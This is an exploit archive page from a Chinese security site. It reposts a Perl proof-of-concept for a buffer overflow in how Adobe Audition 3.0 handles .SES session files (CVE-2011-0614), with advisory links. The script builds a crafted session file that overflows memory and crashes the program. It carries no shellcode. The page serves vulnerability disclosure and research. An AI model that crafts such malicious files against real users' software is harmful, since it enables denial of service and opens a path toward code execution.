首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2011-05-13  

#!/usr/bin/perl
#
#
# Adobe Audition 3.0 (build 7283) Session File Handling Buffer Overflow PoC
#
#
# Vendor: Adobe Systems Inc.
# Product web page: http://www.adobe.com/products/audition/
# Affected version: 3.0 (build 7238)
#
# Summary: Recording, mixing, editing, and mastering — Adobe® Audition® 3 software is the
# all-in-one toolset for professional audio production.
#
# Desc: Adobe Audition suffers from a buffer overflow vulnerability when dealing with .SES
# (session) format file. The application failz to sanitize the user input resulting in a
# memory corruption, overwriting several memory registers which can aid the atacker to gain
# the power of executing arbitrary code or denial of service.
#
# Tested on Microsoft Windows XP Professional SP3 (English)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# http://img225.imageshack.us/img225/9871/boferror.jpg
#
#
# Zero Science Lab Advisory ID: ZSL-2011-5012
# Zero Science Lab Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5012.php
#
# Adobe Advisory ID: APSB11-10
# Adobe Advisory URL: http://www.adobe.com/support/security/bulletins/apsb11-10.html
#
# CVE ID: CVE-2011-0614
#
#
# 18.09.2009
#


$data = "\x43\x4F\x4F\x4C\x4E\x45\x53\x53\x50\xF2\x08\x00".
 "\x68\x64\x72\x20\xF0\x03\x00\x00\x22\x56\x00\x00".
 "\xFC\x17\x0A\x00\x00\x00\x00\x00\x20\x00\x01\x00".
 "\x00\x00\x00\x00\x00\x00\xF0\x3F\x00\x00\x00\x00".
 "\x00\x00\xF0\x3F\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
 "\x41\x41\x41\x41\x00";


$FNAME = "Assassin.ses";

print "\n\n[*] Creating malicious session file: $FNAME ...\r\n";

open(ses, ">./$FNAME") || die "\n\aCannot open $FNAME: $!";

print ses "$data";
sleep(1);

close (ses);

print "\n[*] Malicious session file successfully crafted!\r\n\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·A-PDF Wav to MP3 Converter v 1
·Win32 VB6_vbaExceptHandler - S
·A-PDF All to MP3 Converter v.2
·Chasys Media Player Buffer Ove
·SlimPDF Reader PoC
·DreamBox DM500(+) Arbitrary Fi
·Symantec Backup Exec System Re
·Winamp 5.61 'in_midi' componen
·XtreamerPRO Media-player Multi
·Steam Software Denial of Servi
·onArcade v1.1.1 Game CSRF (Cro
·CoolPlayer Portable 2.19.2 Buf
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved